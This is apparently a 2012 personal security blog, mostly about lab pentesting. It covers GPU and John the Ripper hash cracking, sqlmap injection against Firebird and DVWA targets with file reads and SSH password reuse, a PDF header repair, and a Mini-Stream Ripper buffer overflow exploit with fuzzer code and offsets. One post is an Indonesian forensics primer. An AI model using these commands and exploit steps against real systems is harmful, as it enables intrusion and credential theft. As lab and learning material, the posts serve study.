Monday, September 24, 2012

John The Ripper VS GPU oclhashcat+

hi guys,  long time no see... :D
now i want to share my experience about differences crack password using John The Ripper and GPU oclhashcat+. ok,check this out :D

i have a Badstore ctf on my virtualbox,

 i was take over that databases,, in there are one database, badstoredb.

so i try to find users table in there. this is the user tables..

now i want to see content of userdb,so i select all content from userdb using command on mysql.

 wow, now i have user and password,but the password not hash :(
don't worry guys, now i want to using John The Ripper and GPU oclhashcat+ to crack password's admin, i will try to create two file with name JTR and GPU to distinguish between JTR with GPU. we are using admin password to JTR and GPU.

this is same hash from admin. i run JTR with GPU on the same time, same dictionary (darkc0de.lst).. but what i see, GPU can fast crack the password!
let's see this !
this is the plantext:
====================================================
root@bt:/pentest/passwords/oclhashcat+# ./oclHashcat-plus32.bin -m 0 /root/Desktop/gpu /pentest/passwords/wordlists/darkc0de.lst
oclHashcat-plus v0.07 by atom starting...

Hashes: 1
Unique digests: 1
Bitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes
Rules: 1
GPU-Loops: 128
GPU-Accel: 40
Password lengths range: 1 - 15
Platform: AMD compatible platform found
Watchdog: Temperature limit set to 90c
Device #1: Loveland, 384MB, 0Mhz, 2MCU
Device #1: Allocating 12MB host-memory
Device #1: Kernel ./kernels/4098/m0000_a0.Loveland.32.kernel (1130280 bytes)

Scanning dictionary /pentest/passwords/wordlists/darkc0de.lst: 1047587 bytes (5.Scanned dictionary /pentest/passwords/wordlists/darkc0de.lst: 17975854 bytes, 1707657 words, 1707657 keyspace, starting attack...

5ebe2294ecd0e0f08eab7690d2a6ee69:secret
                                   
Status.......: Cracked
Input.Mode...: File (/pentest/passwords/wordlists/darkc0de.lst)
Hash.Target..: 5ebe2294ecd0e0f08eab7690d2a6ee69
Hash.Type....: MD5
Time.Running.: 0 secs
Time.Util....: 924.9ms/524.9ms Real/CPU, 131.2% idle
Speed........:  1616.4k c/s Real,  1880.1k c/s GPU
Recovered....: 1/1 Digests, 1/1 Salts
Progress.....: 1550322/1707657 (90.79%)
Rejected.....: 55282/1550322 (3.57%)
HW.Monitor.#1: 63% GPU, 72c Temp

Started: Tue Sep 25 05:25:58 2012
Stopped: Tue Sep 25 05:25:59 2012

root@bt:/pentest/passwords/oclhashcat+#
====================================================


and see JTR :
this is the plantext :
====================================================
root@bt:/pentest/passwords/john# john /pentest/passwords/wordlists/darkc0de.lst /root/Desktop/JTR
Warning: only loading hashes of type "trip", but also saw type "pix-md5"
Use the "--format=pix-md5" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "des"
Use the "--format=des" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "mysql"
Use the "--format=mysql" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "oracle"
Use the "--format=oracle" option to force loading hashes of that type instead
Warning: only loading hashes of type "trip", but also saw type "lm"
Use the "--format=lm" option to force loading hashes of that type instead
Loaded 48504 password hashes with no different salts (Tripcode DES [128/128 BS SSE2])
guesses: 0  time: 0:00:22:12 0.00% (3)  c/s: 16596M  trying: 41675*1d - 4176791d
Session aborted
root@bt:/pentest/passwords/john#

====================================================

it's very different guys..
ok see next time:D

Tuesday, July 31, 2012

ignore switch -D on Firebird (SQLMAP)

hi there, i want to share my experience, 
i found an error on 192.168.56.102/index.php?page=beritaDetail&id=103, so i use sqlmap to retrive databases. i type on sqlmap
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbs" few minutes later, i have a problem, that my sqlmap can't retrieve the databases names.
this is the result :
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
i try to read sqlmap user's manual on http://sqlmap.sourceforge.net/doc/README.html sqlmap support to attack this database(firebird),and this is list databases :

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.
  • but why my sqlmap can retrieve the databases names.

     So, i ask to my friend how to get a solution. and he answer that it's means that sqlmap won't be able to retrieve databases names as everything is going in a single one. and  i just have --tables and i must ignore  switch -D on firebird (also the same on SQLite and MsAccess).

    so i try to ignore -D, likes this :
    "./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbms Firebird --tables" and what i see, i can through this problem, this is the result 
    "web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: Firebird 2.0
    [14:33:30] [INFO] fetching tables for database: Firebird_masterdb
    [14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"


    Tuesday, April 24, 2012

    simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

    hello guys, now i want to share hacking web in another attack vector.
    i have a victim in address 192.168.56.101. i want to look the service has run, so i use nmap,
    root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

    Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
    Nmap scan report for 192.168.56.101
    Host is up (0.0016s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
    3306/tcp open  mysql   MySQL (unauthorized)
    MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
    Service Info: OS: Linux

    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
    root@archaveliano:/home/localhost# 


    In there i find a from to input user ID, and try to enter mark " ' " in there. And i find error syntax like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

     it's time to work, i opened my sqlmap, and i type this "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 --dbms MySQL --dbs" the information is -u for the URL --cookie for cookie, because this web need to login inside, -p to parameter site vuln, --risk for risk to test the web (max=3) -- level of test the web (max=5), --thread for Max number of concurrent HTTP(s) requests (max=10). --dbms for Force back-end DBMS to this value, and --dbs for Enumerate DBMS databases. 

    it's not a long time to wait, i can retrive the databases like this :
    22:22:06] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [22:22:06] [INFO] fetching database names
    [22:22:06] [INFO] the SQL query used returns 4 entries
    [22:22:06] [INFO] starting 4 threads
    [22:22:06] [INFO] retrieved: information_schema
    [22:22:06] [INFO] retrieved: mysql
    [22:22:06] [INFO] retrieved: fbip
    [22:22:06] [INFO] retrieved: dvwa
    available databases [4]:
    [*] dvwa
    [*] fbip
    [*] information_schema
    [*] mysql

    now i have 4 databases. now i will to take over mysql database. and i enter this on sqlmap "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 -D mysql --tables --dbs"
     but i have a problem, the problem like this 
    [22:15:20] [WARNING] no column(s) found
    [22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

    i try to find another way, and i remember that sqlmap not only can take over the database, but it can read some file on site, now i will try it. but before i try, i should know, where the file that i need, so i must need dirbuster to find the file.
    file that i need to be on /config/config.inc.php, so on sqlmap, i enter this :
    "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1"and i take over web config:
    it will save on web name/files :
    now i know user and password mysql this web, i try to enter the user and password mysql but i find a problem again :
    root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
    Enter password: 
    ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server

    i try to enter ssh, because sometimes people get used to make the same password.
    root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

    and this is the result :

    it's very simple, right?!






    Friday, March 9, 2012

    Belajar Tentang Komputer Forensik (Basic)

         Sebelum kita belajar komputer forensik, sebaiknya kita megetahui dulu apa arti forensik dan komputer forensik itu sendiri. Forensik adalah pengumpulan barang bukti yang berkaitan dengan sebuah kasus, dan dapat dijadikan barang bukti yang sah di pengadilan. Sedangkan komputer forensik sendiri adalah pengumpulan barang bukti yang berbentuk sistem informasi, baik perangkat keras ataupun perangkat lunak, yang berkaitan dengan kasus, dan dapat dijadikan barang bukti yang sah di pengadilan.
         Orang-orang yang ingin belajar komputer forensik, harus juga memahami tentang hacking, sistem operasi itu bekerja, dan forensik itu sendiri. Hal ini akan dibutuhkan, jika kasus yang akan ditangani berkaitan dengan kejahatan digital.
         Sebelum melakukan kegiatan komputer forensik, sebaiknya kita mengetahui dulu tentang pondasi dari komputer forensik tersebut, hal ini dikarenakan jika tidak mengetahui dan memegang teguh pondasi dari komputer forensik itu sendiri, maka kegiatan komputer forensik tidak akan berjalan maksimal.

    1. identification
      hal ini dilakukan ditempat kejadian perkara, yakni memilah milah barang bukti mana yang tepat untuk dijadikan barang bukti di depan pengadilan.

    2. Collecting ( di tempat kejadian perkara )
      a. chain of custody : hal yang dilakukan dalam chain of custody adalah memberi label pada barang bukti, menjaga, supaya barang bukti tersebut tidak ada perubahan diwaktu pengkloningan data-data, jika terjadi perubahan sewaktu pengkloningan, maka barang bukti dianggap tidak sah.

      b. acquisition : kegiatan ini adalah pengkloningan barang bukti ( biasanya dalam bentu data , contoh : pengkloningan 1 hardisk, bit per bit)

      c. fingerprint : hasil dari kloningan tersebut dicocokan dengan barang bukti asli, jika terjadi perbedaan 1 bit saja, maka barang bukti tidak sah.

    3. analysis
      a. chain of custody : ini berbeda dengan chain of costudy di saat fase collecting. Di fase ini, kita akan membuat barang bukti yang kita kloning tersebut tidak dapat ditulis (block writing), hal ini supaya barang bukti yang kita dapat tidak berubah sedikitpun.

      b. analysis : di fase ini, kita ditantang kehebatan analisis kita, karena di fase ini, kita benar-benar mengandalkan kemampuan analisa kita.

      c. collecting : collecting disini adalah pengumpulan hasil analisa kita.

      d. reconstruction : setelah hasil analisa kita kumpulkan, sebaiknya kita rekontruksikan, hal ini supaya bisa kita ceritakan di depan pengadilan.

    4. Presentasi / report
      fase terakhir sebelum ke pengadilan, yaitu penulisan report dan kesimpulan.

    Itu adalah pondasi dari belajar komputer forensik, kemampuan dan usaha yang luar biasa kita untuk belajar forensik benar-benar ditantang disini

    Saturday, March 3, 2012

    play with peepdf (basic)

    Tested           : backtrack 5 r2 
    Tools             : peepdf, foxit reader 
    Title of pdf     : forensics.pdf, linux.pdf and howto.pdf 
    Target            : forensics.pdf 

    now I learn about computer forensic, and I have a problem with my PDF, my PDF can't open.
    This is the picture :

    now open peepdf on backtrack tools. And then I type “./peepdf.py -h” to know how to use this tools.

    root@archaveliano:/pentest/forensics/peepdf# ./peepdf.py -h 
    Usage: ./peepdf.py [options] PDF_file 


    Options: 
      -h, --help            show this help message and exit 
      -i, --interactive     Sets console mode. 
      -f, --force-mode      Sets force parsing mode to ignore errors. 
      -l, --loose-mode      Sets loose parsing mode to catch malformed objects. 
      -s SCRIPTFILE, --load-script=SCRIPTFILE 
                            Load the commands stored in the specified file and 
                            execute them. 

    after I know, I try to set console mode :
    root@archaveliano:/pentest/forensics/peepdf# ./peepdf.py -i /media/BCA8-FC99/forensics.pdf  
    Error: Bad PDF header!! () 

    ok, now I know that my pdf file have a bad header, so I try to find header pdf. I must have a normal file
    pdf , so I take the other file pdf to equal with my forensics.pdf. So I choose linux.pdf and howto.pdf to
    equal that header with forensics.pdf

    open linux.pdf , howto.pdf and forensics.pdf in hexedit. This is an screenshoot :

    look forensics.pdf, that have different with linux.pdf and howto.pdf in header, so I try to edit
    forensics.pdf header from AA 50 44 AA  2D AA 2E with 25 50 44 46  2D 31 2E . and save it.

    Now I try to open forensics.pdf with foxit reader. And this is the result.

    -=CMIIW=-


    Monday, February 20, 2012

    Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow

    # Exploit Title: Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow
    # Link: http://mini-stream.net/mini-stream-ripper/download/
    # Version: 3.1.3.2.2010.06.13
    # Tested on: Microsoft Windows XP SP 2

    ok, i have this fuzzer, and i'll try to exploit this application, fuzzer :

    wed = "http://."
    wed+= "\x41" * 18000
    f=open("dos.ram","w+")
    f.write(wed)
    f.close()

    let's try to catch that. first time, prepare immunity debbuger, fuzzer and mini stream ripper. then running this application from immunity, when i load my fuzzer, i find that the application error in 18000 char, and i can see that address of EIP covered by 414141. we know this is direct ret, so this is will easily. now i try to find how many byte EIP covered using pattern_create by framework. this address of EIP covered by char 69573569 and ESP Wi8Wi9Wj0. after this, we can know how many byte the registers covered using pattern_offset.

    ESP hit the byte 17424 and EIP hit the byte in  17416. now, i'll try using this fuzzer to ensure address from EIP.

    wed = "http://."
    wed+= "\x90" * 17416
    wed+= "\xEF\xBE\xAD\xDE"
    f=open("dos.ram","w+")
    f.write(wed)
    f.close()

    and address from EIP change DEADBEEF. after this, i'll try to find JMP ESP, let's go find it :D
    with this fuzzer i find address of JMP ESP in user32.dll with address 77D8AF0A.

    wed = "http://."
    wed+= "\x90" * 17416
    wed+= "\xEF\xBE\xAD\xDE"
    wed+= "\x90" * (17424 -len(wed))
    wed+= "\xCC" * (18000 -len(wed))
    f=open("dos.ram","w+")
    f.write(wed)
    f.close()

    now i try to exploit this application with payload from metasploit.

    Friday, February 10, 2012

    PERINGATAN!!

    to : IS2C
    KERJAKAN SENDIRI!!! 
    kalau ada yang sama, dengan apa yang ada di blog ini, besok ada hukuman.